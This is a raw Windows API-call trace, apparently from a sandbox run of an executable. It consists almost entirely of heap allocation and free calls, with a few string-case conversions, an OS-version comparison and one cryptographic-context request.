[0189.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0189.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0189.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.036] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.037] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.037] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0189.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.037] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.037] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0189.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0189.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0189.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0189.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0189.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0189.037] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0189.038] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0189.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0189.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0189.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0189.038] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.038] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.038] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.038] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.038] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0189.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0189.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0189.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa520 [0189.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0189.039] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0189.039] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0189.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0189.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0189.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0189.039] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0189.039] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0189.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0189.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0189.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0189.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0189.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0189.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0189.039] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0189.039] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0189.039] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0189.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0189.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0189.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0189.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0189.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0189.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0189.040] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0189.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0189.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0189.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0189.040] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xaa3868) returned 1 [0189.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0189.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0189.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0189.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0189.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0189.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0189.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0189.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0189.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0189.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0189.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0189.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0189.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0189.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0189.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0189.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0189.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0189.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0189.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0189.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0189.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0189.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0189.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0189.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0189.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0189.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0189.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0189.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0189.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0189.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0189.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0189.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0189.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0189.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0189.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0189.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0189.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0189.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0189.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0189.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0189.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0189.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0189.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0189.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0189.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0189.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0189.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0189.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0189.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0189.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0189.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0189.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0189.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0189.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0189.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0189.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0189.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0189.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0189.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0189.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0189.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0189.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0189.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0189.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0189.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0189.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0189.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0189.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0189.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0189.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0189.045] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0189.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0189.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0189.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0189.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0189.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0189.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0189.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0189.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0189.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0189.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0189.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0189.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0189.045] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0189.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0189.046] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0189.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0189.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0189.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13d8 [0189.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0189.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0189.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0189.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0189.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0189.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0189.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0189.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0189.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0189.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0189.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0189.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0189.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0189.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0189.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0189.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0189.047] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0189.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0189.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0189.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0189.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0189.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0189.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0189.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0189.047] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0189.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0189.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0189.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0189.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0189.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0189.048] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 